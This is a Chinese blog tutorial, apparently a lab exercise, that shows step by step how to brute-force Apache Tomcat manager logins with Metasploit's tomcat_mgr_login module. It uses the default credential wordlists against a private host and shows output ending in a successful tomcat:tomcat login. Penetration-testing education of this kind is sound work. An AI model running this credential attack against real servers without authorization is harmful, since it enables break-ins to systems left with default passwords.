zoukankan      html  css  js  c++  java

  • 安全测试18渗透攻击Tomcat服务

    1、打开msfconsole控制台

    msfconsole

     2、搜索有效的Tomcat模块

    msf > search tomcat

     这里我们选择使用模块auxiliary/scanner/http/tomcat_mgr_login 

    3.使用Tomcat管理登录模块进行渗透攻击,执行命令如下:

    msf6 > use auxiliary/scanner/http/tomcat_mgr_login

     4,查看tomcat_mgr_login模块有效选项,执行命令

    msf auxiliary(scanner/http/tomcat_mgr_login) > show options

    5.指定用户名和密码文件,这里使用默认路径

    msf6 auxiliary(scanner/http/tomcat_mgr_login) > set user_file /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
user_file => /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set pass_file /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
pass_file => /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
msf6 auxiliary(scanner/http/tomcat_mgr_login) >

    6.指定要攻击的目标服务器

    msf auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.52.132

    7.设置服务器端口号为8180

    msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180
rport => 8180
msf6 auxiliary(scanner/http/tomcat_mgr_login) >

    8,运行渗透程序

    msf auxiliary(scanner/http/tomcat_mgr_login) > exploit 

[!] No active DB -- Credential data will not be saved!
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:root (Incorrect)
[+] 192.168.52.132:8180 - Login Successful: tomcat:tomcat
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

     从结果中可以看到找到的账号密码为tomcat,tomcat

    更多技术请关注微信公众号:程序员技术前沿
  • 相关阅读:
    centos7 安装openGauss极简版本
    postgresql 通过一个表创建一个新表
    postgresql字符串函数与操作符
    SQLServer查看各个表大小
    seata1.3 分布式事务集成 AT模式
    用户体验——以用户为中心的Web设计_Chapter1. 用户体验为什么如此重要
    用户体验——以用户为中心的Web设计_Chapter2. 认识这些要素
    用户体验——以用户为中心的Web设计_Chapter3. 战略层:网站目标和用户需求
    用户体验——以用户为中心的Web设计_Chapter4. 范围层:功能规格和内容需求
    lineheight 详解,及个别问题
  • 原文地址:https://www.cnblogs.com/tiechui2015/p/15715073.html
Copyright © 2011-2022 走看看